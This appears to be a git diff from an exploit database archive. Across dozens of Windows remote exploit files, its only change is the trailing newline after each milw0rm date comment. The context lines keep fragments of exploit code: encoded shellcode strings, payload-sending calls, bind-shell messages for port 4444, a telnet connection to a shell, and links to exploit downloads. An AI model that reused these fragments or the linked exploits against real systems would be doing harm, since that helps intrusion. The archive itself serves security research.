c3cde7af5..83d6acb91 100755 --- a/platforms/windows/remote/4715.txt +++ b/platforms/windows/remote/4715.txt @@ -108,4 +108,4 @@ almost two weeks. ####################################################################### -# milw0rm.com [2007-12-10] +# milw0rm.com [2007-12-10] \ No newline at end of file diff --git a/platforms/windows/remote/472.c b/platforms/windows/remote/472.c index 53314e0c0..872554c61 100755 --- a/platforms/windows/remote/472.c +++ b/platforms/windows/remote/472.c @@ -151,4 +151,4 @@ void main() fcloseall(); } -// milw0rm.com [2004-09-22] +// milw0rm.com [2004-09-22] \ No newline at end of file diff --git a/platforms/windows/remote/4720.html b/platforms/windows/remote/4720.html index 69a8309d0..ccf63c4df 100755 --- a/platforms/windows/remote/4720.html +++ b/platforms/windows/remote/4720.html @@ -253,4 +253,4 @@ function spawn2() -# milw0rm.com [2007-12-11] +# milw0rm.com [2007-12-11] \ No newline at end of file diff --git a/platforms/windows/remote/4724.py b/platforms/windows/remote/4724.py index dbaa69b31..f2f5bdb48 100755 --- a/platforms/windows/remote/4724.py +++ b/platforms/windows/remote/4724.py @@ -86,4 +86,4 @@ expl.send (buffer) expl.close() print "[+] Payload Sent, ph33r." -# milw0rm.com [2007-12-12] +# milw0rm.com [2007-12-12] \ No newline at end of file diff --git a/platforms/windows/remote/473.c b/platforms/windows/remote/473.c index b17593219..bae3c4737 100755 --- a/platforms/windows/remote/473.c +++ b/platforms/windows/remote/473.c @@ -259,4 +259,4 @@ return 0; } -// milw0rm.com [2004-09-22] +// milw0rm.com [2004-09-22] \ No newline at end of file diff --git a/platforms/windows/remote/4745.cpp b/platforms/windows/remote/4745.cpp index 8255030f1..2d86f5387 100755 --- a/platforms/windows/remote/4745.cpp +++ b/platforms/windows/remote/4745.cpp @@ -352,4 +352,4 @@ int main(int argc, char * argv[]){ return 0; } -// milw0rm.com [2007-12-18] +// milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/windows/remote/4746.html b/platforms/windows/remote/4746.html index 4e329108e..0a5743c04 100755 --- a/platforms/windows/remote/4746.html +++ b/platforms/windows/remote/4746.html @@ -86,4 +86,4 @@ -# milw0rm.com [2007-12-18] +# milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/windows/remote/4747.vbs b/platforms/windows/remote/4747.vbs index aa5bf2e30..3377d1954 100755 --- a/platforms/windows/remote/4747.vbs +++ b/platforms/windows/remote/4747.vbs @@ -35,4 +35,4 @@ del in :nowhere -rem milw0rm.com [2007-12-18] +rem milw0rm.com [2007-12-18] \ No newline at end of file diff --git a/platforms/windows/remote/475.sh b/platforms/windows/remote/475.sh index aec973e28..9e58c3168 100755 --- a/platforms/windows/remote/475.sh +++ b/platforms/windows/remote/475.sh @@ -184,4 +184,4 @@ printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"; #******************************************** printf "\xFF\xD9"; -# milw0rm.com [2004-09-23] +# milw0rm.com [2004-09-23] \ No newline at end of file diff --git a/platforms/windows/remote/4760.txt b/platforms/windows/remote/4760.txt index dc688152d..1de8f9442 100755 --- a/platforms/windows/remote/4760.txt +++ b/platforms/windows/remote/4760.txt @@ -81,4 +81,4 @@ C:\WINNT\system32> Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4760.zip (2007-MessageQueue.zip) -# milw0rm.com [2007-12-21] +# milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/platforms/windows/remote/478.c b/platforms/windows/remote/478.c index f42b8fded..9a8990ac5 100755 --- a/platforms/windows/remote/478.c +++ b/platforms/windows/remote/478.c @@ -210,4 +210,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2004-09-25] +// milw0rm.com [2004-09-25] \ No newline at end of file diff --git a/platforms/windows/remote/4784.pl b/platforms/windows/remote/4784.pl index 87e686e99..395b4effc 100755 --- a/platforms/windows/remote/4784.pl +++ b/platforms/windows/remote/4784.pl @@ -102,4 +102,4 @@ sleep(2); system("telnet $host 4444"); exit; -# milw0rm.com [2007-12-24] +# milw0rm.com [2007-12-24] \ No newline at end of file diff --git a/platforms/windows/remote/48.c b/platforms/windows/remote/48.c index 17f8d3706..d6f8301c3 100755 --- a/platforms/windows/remote/48.c +++ b/platforms/windows/remote/48.c @@ -251,4 +251,4 @@ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); } -// milw0rm.com [2003-07-01] +// milw0rm.com [2003-07-01] \ No newline at end of file diff --git a/platforms/windows/remote/480.c b/platforms/windows/remote/480.c index a4a1f8403..9adb833ec 100755 --- a/platforms/windows/remote/480.c +++ b/platforms/windows/remote/480.c @@ -426,4 +426,4 @@ int main(int argc, char *argv[]) return(EXIT_SUCCESS); } -// milw0rm.com [2004-09-25] +// milw0rm.com [2004-09-25] \ No newline at end of file diff --git a/platforms/windows/remote/4806.html b/platforms/windows/remote/4806.html index 31e59c20a..0495e9776 100755 --- a/platforms/windows/remote/4806.html +++ b/platforms/windows/remote/4806.html @@ -111,4 +111,4 @@ unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/windows/remote/4818.html b/platforms/windows/remote/4818.html index 286dd983d..913ad9b08 100755 --- a/platforms/windows/remote/4818.html +++ b/platforms/windows/remote/4818.html @@ -113,4 +113,4 @@ var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/windows/remote/4819.html b/platforms/windows/remote/4819.html index a883ae395..ecbdd208b 100755 --- a/platforms/windows/remote/4819.html +++ b/platforms/windows/remote/4819.html @@ -111,4 +111,4 @@ var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/windows/remote/4820.html b/platforms/windows/remote/4820.html index c0a7ceefe..699485192 100755 --- a/platforms/windows/remote/4820.html +++ b/platforms/windows/remote/4820.html @@ -112,4 +112,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/windows/remote/4825.html b/platforms/windows/remote/4825.html index 4b132afe3..b36ebbc6c 100755 --- a/platforms/windows/remote/4825.html +++ b/platforms/windows/remote/4825.html @@ -112,4 +112,4 @@ var shellcode2 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/windows/remote/4866.py b/platforms/windows/remote/4866.py index 159d17bd2..ea7d64166 100755 --- a/platforms/windows/remote/4866.py +++ b/platforms/windows/remote/4866.py @@ -115,4 +115,4 @@ print "[+] Payload sent, check your shell on %s port 4444" % addr[0] c.close() s.close() -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/windows/remote/4868.html b/platforms/windows/remote/4868.html index 288406f58..72b641320 100755 --- a/platforms/windows/remote/4868.html +++ b/platforms/windows/remote/4868.html @@ -68,4 +68,4 @@ var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/windows/remote/4869.html b/platforms/windows/remote/4869.html index 119f94992..27b0b4e34 100755 --- a/platforms/windows/remote/4869.html +++ b/platforms/windows/remote/4869.html @@ -27,4 +27,4 @@ This method is also vulnerable to a buffer overflow in the 2nd and 4th parameter -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/windows/remote/4873.html b/platforms/windows/remote/4873.html index 7d2b4bb4f..a296a9d2f 100755 --- a/platforms/windows/remote/4873.html +++ b/platforms/windows/remote/4873.html @@ -28,4 +28,4 @@ -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/windows/remote/4874.html b/platforms/windows/remote/4874.html index 82587cca0..66c7de9c3 100755 --- a/platforms/windows/remote/4874.html +++ b/platforms/windows/remote/4874.html @@ -39,4 +39,4 @@ End Sub -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/windows/remote/4894.html b/platforms/windows/remote/4894.html index 3163007c3..63e00e370 100755 --- a/platforms/windows/remote/4894.html +++ b/platforms/windows/remote/4894.html @@ -66,4 +66,4 @@ var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" + -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/windows/remote/4903.html b/platforms/windows/remote/4903.html index ff53926bd..9e2854399 100755 --- a/platforms/windows/remote/4903.html +++ b/platforms/windows/remote/4903.html @@ -28,4 +28,4 @@ suntzu.TimeSpanFormat(nTime ,wszFormat); -# milw0rm.com [2008-01-13] +# milw0rm.com [2008-01-13] \ No newline at end of file diff --git a/platforms/windows/remote/4906.txt b/platforms/windows/remote/4906.txt index 4cbbf0743..52cb1475a 100755 --- a/platforms/windows/remote/4906.txt +++ b/platforms/windows/remote/4906.txt @@ -2,4 +2,4 @@ Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4906.zip (2008-quicktimebof.zip) -# milw0rm.com [2008-01-14] +# milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/platforms/windows/remote/4909.html b/platforms/windows/remote/4909.html index ff13570b7..f621c0243 100755 --- a/platforms/windows/remote/4909.html +++ b/platforms/windows/remote/4909.html @@ -32,4 +32,4 @@ Tested on Windows XP SP2(fully patched) English, IE6, ISDM.exe version 6.1.100.6 -# milw0rm.com [2008-01-14] +# milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/platforms/windows/remote/4913.html b/platforms/windows/remote/4913.html index 7dfb99fee..cf2065b18 100755 --- a/platforms/windows/remote/4913.html +++ b/platforms/windows/remote/4913.html @@ -23,4 +23,4 @@ Tested on Windows XP SP2(fully patched) English, IE6, isusweb.dll version 6.1.10 -# milw0rm.com [2008-01-15] +# milw0rm.com [2008-01-15] \ No newline at end of file diff --git a/platforms/windows/remote/4918.html b/platforms/windows/remote/4918.html index 901718c89..fb363ae0d 100755 --- a/platforms/windows/remote/4918.html +++ b/platforms/windows/remote/4918.html @@ -76,4 +76,4 @@ PTZCamPanelCtrl.ConnectServer(server,user); -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/windows/remote/4923.txt b/platforms/windows/remote/4923.txt index c0fe65f8f..334bf2981 100755 --- a/platforms/windows/remote/4923.txt +++ b/platforms/windows/remote/4923.txt @@ -61,4 +61,4 @@ http://www.bugtraq.ir/adv/miniweb_english.pdf (english) Copyright : http://www.bugtraq.ir -# milw0rm.com [2008-01-16] +# milw0rm.com [2008-01-16] \ No newline at end of file diff --git a/platforms/windows/remote/4932.html b/platforms/windows/remote/4932.html index 49d09cce0..c0b2ded2c 100755 --- a/platforms/windows/remote/4932.html +++ b/platforms/windows/remote/4932.html @@ -75,4 +75,4 @@ RtspVaPgCtrl.MP4Prefix = puf; -# milw0rm.com [2008-01-17] +# milw0rm.com [2008-01-17] \ No newline at end of file diff --git a/platforms/windows/remote/4934.c b/platforms/windows/remote/4934.c index dcad9485f..ea9a2b3f4 100755 --- a/platforms/windows/remote/4934.c +++ b/platforms/windows/remote/4934.c @@ -410,4 +410,4 @@ main (int argc, char *argv[]) return 0; } -// milw0rm.com [2008-01-18] +// milw0rm.com [2008-01-18] \ No newline at end of file diff --git a/platforms/windows/remote/4946.html b/platforms/windows/remote/4946.html index 0def3e618..55aa58708 100755 --- a/platforms/windows/remote/4946.html +++ b/platforms/windows/remote/4946.html @@ -63,4 +63,4 @@ RecordSend.SetPort(puf); //SetIpAddress method is vulnerable too, check by yours -# milw0rm.com [2008-01-20] +# milw0rm.com [2008-01-20] \ No newline at end of file diff --git a/platforms/windows/remote/4948.txt b/platforms/windows/remote/4948.txt index 025c2ac0b..6630e83fc 100755 --- a/platforms/windows/remote/4948.txt +++ b/platforms/windows/remote/4948.txt @@ -2,4 +2,4 @@ Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/windows/remote/4949.txt b/platforms/windows/remote/4949.txt index 937456c5f..772b0d494 100755 --- a/platforms/windows/remote/4949.txt +++ b/platforms/windows/remote/4949.txt @@ -2,4 +2,4 @@ Citadel SMTP <= 7.10 Remote Overflow Exploit https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) -# milw0rm.com [2008-01-21] +# milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/platforms/windows/remote/4959.html b/platforms/windows/remote/4959.html index 9612f1c81..41c56fa60 100755 --- a/platforms/windows/remote/4959.html +++ b/platforms/windows/remote/4959.html @@ -70,4 +70,4 @@ var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/windows/remote/4967.html b/platforms/windows/remote/4967.html index cf34a71e9..4ab02ed94 100755 --- a/platforms/windows/remote/4967.html +++ b/platforms/windows/remote/4967.html @@ -115,4 +115,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-22] +# milw0rm.com [2008-01-22] \ No newline at end of file diff --git a/platforms/windows/remote/4974.html b/platforms/windows/remote/4974.html index e9e49f1c0..54d5ccd74 100755 --- a/platforms/windows/remote/4974.html +++ b/platforms/windows/remote/4974.html @@ -16,4 +16,4 @@ obj.ExecuteStr('cmd.exe', '/C echo "hello world" && pause'); -# milw0rm.com [2008-01-23] +# milw0rm.com [2008-01-23] \ No newline at end of file diff --git a/platforms/windows/remote/4979.html b/platforms/windows/remote/4979.html index e1930d44d..2bd5f5847 100755 --- a/platforms/windows/remote/4979.html +++ b/platforms/windows/remote/4979.html @@ -117,4 +117,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-24] +# milw0rm.com [2008-01-24] \ No newline at end of file diff --git a/platforms/windows/remote/4981.html b/platforms/windows/remote/4981.html index 9dea49723..4052fc5af 100755 --- a/platforms/windows/remote/4981.html +++ b/platforms/windows/remote/4981.html @@ -199,4 +199,4 @@ Server: lighttpd/1.4.18 Wrong file type detected for file boot.ini:application/octet-stream -# milw0rm.com [2008-01-24] +# milw0rm.com [2008-01-24] \ No newline at end of file diff --git a/platforms/windows/remote/4982.html b/platforms/windows/remote/4982.html index 23764d09e..887fd2b05 100755 --- a/platforms/windows/remote/4982.html +++ b/platforms/windows/remote/4982.html @@ -117,4 +117,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/windows/remote/4986.html b/platforms/windows/remote/4986.html index 55bd11e10..26a3776c1 100755 --- a/platforms/windows/remote/4986.html +++ b/platforms/windows/remote/4986.html @@ -32,4 +32,4 @@ tml> --> -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/windows/remote/4987.html b/platforms/windows/remote/4987.html index d5b8864eb..cfbba6183 100755 --- a/platforms/windows/remote/4987.html +++ b/platforms/windows/remote/4987.html @@ -115,4 +115,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-25] +# milw0rm.com [2008-01-25] \ No newline at end of file diff --git a/platforms/windows/remote/4999.htm b/platforms/windows/remote/4999.htm index 0a41fde06..b1c49bc05 100755 --- a/platforms/windows/remote/4999.htm +++ b/platforms/windows/remote/4999.htm @@ -30,4 +30,4 @@ d'/ -# milw0rm.com [2008-01-28] +# milw0rm.com [2008-01-28] \ No newline at end of file diff --git a/platforms/windows/remote/5.c b/platforms/windows/remote/5.c index 47a6371e6..cded31a39 100755 --- a/platforms/windows/remote/5.c +++ b/platforms/windows/remote/5.c @@ -203,4 +203,4 @@ void _CRTAPI1 main(int argc, char **argv) RpcEndExcept } /*End of Main*/ -// milw0rm.com [2003-04-03] +// milw0rm.com [2003-04-03] \ No newline at end of file diff --git a/platforms/windows/remote/50.pl b/platforms/windows/remote/50.pl index 7a29ff64c..c04abac13 100755 --- a/platforms/windows/remote/50.pl +++ b/platforms/windows/remote/50.pl @@ -168,4 +168,4 @@ sub gen_sock() { close($sock); } -# milw0rm.com [2003-07-07] +# milw0rm.com [2003-07-07] \ No newline at end of file diff --git a/platforms/windows/remote/5005.html b/platforms/windows/remote/5005.html index 1541b9175..9b3b363ae 100755 --- a/platforms/windows/remote/5005.html +++ b/platforms/windows/remote/5005.html @@ -30,4 +30,4 @@ l_l_darkl0rd_l_l[at]yahoo[dot]com

    -# milw0rm.com [2008-01-29] +# milw0rm.com [2008-01-29] \ No newline at end of file diff --git a/platforms/windows/remote/5025.html b/platforms/windows/remote/5025.html index 979f6c837..b79c1ab4d 100755 --- a/platforms/windows/remote/5025.html +++ b/platforms/windows/remote/5025.html @@ -116,4 +116,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/windows/remote/5028.html b/platforms/windows/remote/5028.html index dfe49cf7c..3bd1fe4d5 100755 --- a/platforms/windows/remote/5028.html +++ b/platforms/windows/remote/5028.html @@ -21,4 +21,4 @@

    -# milw0rm.com [2008-01-31] +# milw0rm.com [2008-01-31] \ No newline at end of file diff --git a/platforms/windows/remote/5045.html b/platforms/windows/remote/5045.html index 40bbe69e9..75a382ac3 100755 --- a/platforms/windows/remote/5045.html +++ b/platforms/windows/remote/5045.html @@ -34,4 +34,4 @@ Tested on Windows XP SP2(fully patched) Korean, IE6, NamoInstaller.dll version 3 -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5046.php b/platforms/windows/remote/5046.php index 514604076..598fc8ac9 100755 --- a/platforms/windows/remote/5046.php +++ b/platforms/windows/remote/5046.php @@ -84,4 +84,4 @@ ?> -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5048.html b/platforms/windows/remote/5048.html index 40cc4a0e6..890bac72b 100755 --- a/platforms/windows/remote/5048.html +++ b/platforms/windows/remote/5048.html @@ -57,4 +57,4 @@ target.AddImage("http://"+buffer,1); -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5049.html b/platforms/windows/remote/5049.html index 65e38d73c..eea4cc483 100755 --- a/platforms/windows/remote/5049.html +++ b/platforms/windows/remote/5049.html @@ -129,4 +129,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5051.html b/platforms/windows/remote/5051.html index dc366a6b7..03db73b7e 100755 --- a/platforms/windows/remote/5051.html +++ b/platforms/windows/remote/5051.html @@ -118,4 +118,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5052.html b/platforms/windows/remote/5052.html index cedc9923f..fc3ccb5e5 100755 --- a/platforms/windows/remote/5052.html +++ b/platforms/windows/remote/5052.html @@ -116,4 +116,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-03] +# milw0rm.com [2008-02-03] \ No newline at end of file diff --git a/platforms/windows/remote/5069.pl b/platforms/windows/remote/5069.pl index 27cbdf0f9..e8a85e0d5 100755 --- a/platforms/windows/remote/5069.pl +++ b/platforms/windows/remote/5069.pl @@ -39,4 +39,4 @@ close($FILE); print "$file has been created \n"; print "Credits:Securfrog"; -# milw0rm.com [2008-02-06] +# milw0rm.com [2008-02-06] \ No newline at end of file diff --git a/platforms/windows/remote/5078.htm b/platforms/windows/remote/5078.htm index 70b3cc29b..81fd250b2 100755 --- a/platforms/windows/remote/5078.htm +++ b/platforms/windows/remote/5078.htm @@ -16,4 +16,4 @@ Recovery\Manager\Services\tomcat\WebApps\axis"/>
    -# milw0rm.com [2008-02-07] +# milw0rm.com [2008-02-07] \ No newline at end of file diff --git a/platforms/windows/remote/5087.html b/platforms/windows/remote/5087.html index 39c3f8eb6..c5a2db65d 100755 --- a/platforms/windows/remote/5087.html +++ b/platforms/windows/remote/5087.html @@ -86,4 +86,4 @@ DirectSS.FindEngine(EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID -# milw0rm.com [2008-02-09] +# milw0rm.com [2008-02-09] \ No newline at end of file diff --git a/platforms/windows/remote/51.c b/platforms/windows/remote/51.c index 55e265be3..14310c731 100755 --- a/platforms/windows/remote/51.c +++ b/platforms/windows/remote/51.c @@ -261,4 +261,4 @@ int sock, sck, h,i,j; return 0; } -// milw0rm.com [2003-07-08] +// milw0rm.com [2003-07-08] \ No newline at end of file diff --git a/platforms/windows/remote/5100.html b/platforms/windows/remote/5100.html index 8c1412acc..01896fb1e 100755 --- a/platforms/windows/remote/5100.html +++ b/platforms/windows/remote/5100.html @@ -117,4 +117,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-10] +# milw0rm.com [2008-02-10] \ No newline at end of file diff --git a/platforms/windows/remote/5102.html b/platforms/windows/remote/5102.html index 45a312ec1..58e846f9a 100755 --- a/platforms/windows/remote/5102.html +++ b/platforms/windows/remote/5102.html @@ -44,4 +44,4 @@ target.FileMask=z.join('') + unescape("%uebFF%uebFF") + unescape("%u1795%u629c") -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/windows/remote/5106.html b/platforms/windows/remote/5106.html index e8cffe167..73ea63a71 100755 --- a/platforms/windows/remote/5106.html +++ b/platforms/windows/remote/5106.html @@ -122,4 +122,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-12] +# milw0rm.com [2008-02-12] \ No newline at end of file diff --git a/platforms/windows/remote/5111.html b/platforms/windows/remote/5111.html index 6b71b301e..aa928a0d5 100755 --- a/platforms/windows/remote/5111.html +++ b/platforms/windows/remote/5111.html @@ -146,4 +146,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-13] +# milw0rm.com [2008-02-13] \ No newline at end of file diff --git a/platforms/windows/remote/5153.asp b/platforms/windows/remote/5153.asp index b2e720d4f..c687578bd 100755 --- a/platforms/windows/remote/5153.asp +++ b/platforms/windows/remote/5153.asp @@ -34,4 +34,4 @@ act.hgs_startNotify(buffer); %> -# milw0rm.com [2008-02-19] +# milw0rm.com [2008-02-19] \ No newline at end of file diff --git a/platforms/windows/remote/5188.html b/platforms/windows/remote/5188.html index 523af0ac3..2f890d523 100755 --- a/platforms/windows/remote/5188.html +++ b/platforms/windows/remote/5188.html @@ -26,4 +26,4 @@ rav.UpdateEngine(); wait for a few seconds after clicking the button -# milw0rm.com [2008-02-25] +# milw0rm.com [2008-02-25] \ No newline at end of file diff --git a/platforms/windows/remote/5190.html b/platforms/windows/remote/5190.html index 86466dca6..47b5fcb95 100755 --- a/platforms/windows/remote/5190.html +++ b/platforms/windows/remote/5190.html @@ -116,4 +116,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-26] +# milw0rm.com [2008-02-26] \ No newline at end of file diff --git a/platforms/windows/remote/5193.html b/platforms/windows/remote/5193.html index 9a3320fba..5e122f72a 100755 --- a/platforms/windows/remote/5193.html +++ b/platforms/windows/remote/5193.html @@ -70,4 +70,4 @@ VAPGDECODERLib.Url = bof; -# milw0rm.com [2008-02-26] +# milw0rm.com [2008-02-26] \ No newline at end of file diff --git a/platforms/windows/remote/5205.html b/platforms/windows/remote/5205.html index 2e156f45b..23964d8e4 100755 --- a/platforms/windows/remote/5205.html +++ b/platforms/windows/remote/5205.html @@ -119,4 +119,4 @@ var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + -# milw0rm.com [2008-02-29] +# milw0rm.com [2008-02-29] \ No newline at end of file diff --git a/platforms/windows/remote/5212.py b/platforms/windows/remote/5212.py index 21f3135bf..a4b9853e4 100755 --- a/platforms/windows/remote/5212.py +++ b/platforms/windows/remote/5212.py @@ -29,4 +29,4 @@ try: except: print "Connection Error" -# milw0rm.com [2008-03-03] +# milw0rm.com [2008-03-03] \ No newline at end of file diff --git a/platforms/windows/remote/5213.txt b/platforms/windows/remote/5213.txt index adcfdf300..073472b3e 100755 --- a/platforms/windows/remote/5213.txt +++ b/platforms/windows/remote/5213.txt @@ -2,4 +2,4 @@ Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip) -# milw0rm.com [2008-03-04] +# milw0rm.com [2008-03-04] \ No newline at end of file diff --git a/platforms/windows/remote/5228.txt b/platforms/windows/remote/5228.txt index ba22a8c52..5fcfa0afa 100755 --- a/platforms/windows/remote/5228.txt +++ b/platforms/windows/remote/5228.txt @@ -95,4 +95,4 @@ No fix ####################################################################### -# milw0rm.com [2008-03-10] +# milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/windows/remote/5230.txt b/platforms/windows/remote/5230.txt index 997dee518..2a8a3cea6 100755 --- a/platforms/windows/remote/5230.txt +++ b/platforms/windows/remote/5230.txt @@ -74,4 +74,4 @@ No fix ####################################################################### -# milw0rm.com [2008-03-10] +# milw0rm.com [2008-03-10] \ No newline at end of file diff --git a/platforms/windows/remote/5238.py b/platforms/windows/remote/5238.py index 94026eb06..3ec0207dc 100755 --- a/platforms/windows/remote/5238.py +++ b/platforms/windows/remote/5238.py @@ -271,4 +271,4 @@ if __name__ == "__main__": tb2 = Tb2FileSender(target, fake_src_ip, fake_hostname, fake_username, dest_filename, file_content) tb2.send() -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/windows/remote/5248.py b/platforms/windows/remote/5248.py index 5e2eb2040..f10e8092a 100755 --- a/platforms/windows/remote/5248.py +++ b/platforms/windows/remote/5248.py @@ -152,4 +152,4 @@ s.send("A654 FETCH 2:4 (FLAGS BODY[" + EVIL + " (DATE FROM)])\r\n") s.close() print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444) -# milw0rm.com [2008-03-13] +# milw0rm.com [2008-03-13] \ No newline at end of file diff --git a/platforms/windows/remote/5249.pl b/platforms/windows/remote/5249.pl index 46c8f81af..e2803abaf 100755 --- a/platforms/windows/remote/5249.pl +++ b/platforms/windows/remote/5249.pl @@ -88,4 +88,4 @@ system("telnet $host 4444"); close $socket; exit; -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/windows/remote/5259.py b/platforms/windows/remote/5259.py index 227591cbb..bdff8a71b 100755 --- a/platforms/windows/remote/5259.py +++ b/platforms/windows/remote/5259.py @@ -165,4 +165,4 @@ s.send('0002 LIST () "/' + EVIL + '" "PWNED"\r\n') print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444) s.close() -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/windows/remote/5264.html b/platforms/windows/remote/5264.html index 43f923230..89496b6b3 100755 --- a/platforms/windows/remote/5264.html +++ b/platforms/windows/remote/5264.html @@ -64,4 +64,4 @@ obj.AddColumn(buf, 1); -# milw0rm.com [2008-03-16] +# milw0rm.com [2008-03-16] \ No newline at end of file diff --git a/platforms/windows/remote/5269.txt b/platforms/windows/remote/5269.txt index bb676e3d5..0a68347a7 100755 --- a/platforms/windows/remote/5269.txt +++ b/platforms/windows/remote/5269.txt @@ -127,4 +127,4 @@ No fix ####################################################################### -# milw0rm.com [2008-03-17] +# milw0rm.com [2008-03-17] \ No newline at end of file diff --git a/platforms/windows/remote/5314.py b/platforms/windows/remote/5314.py index b0daae945..f2e7efab6 100755 --- a/platforms/windows/remote/5314.py +++ b/platforms/windows/remote/5314.py @@ -77,4 +77,4 @@ print "[*] Sending evil packet, ph33r" s.sendto(muha, (host, port)) print "[*] Check port 4444 for bindshell" -# milw0rm.com [2008-03-26] +# milw0rm.com [2008-03-26] \ No newline at end of file diff --git a/platforms/windows/remote/5315.py 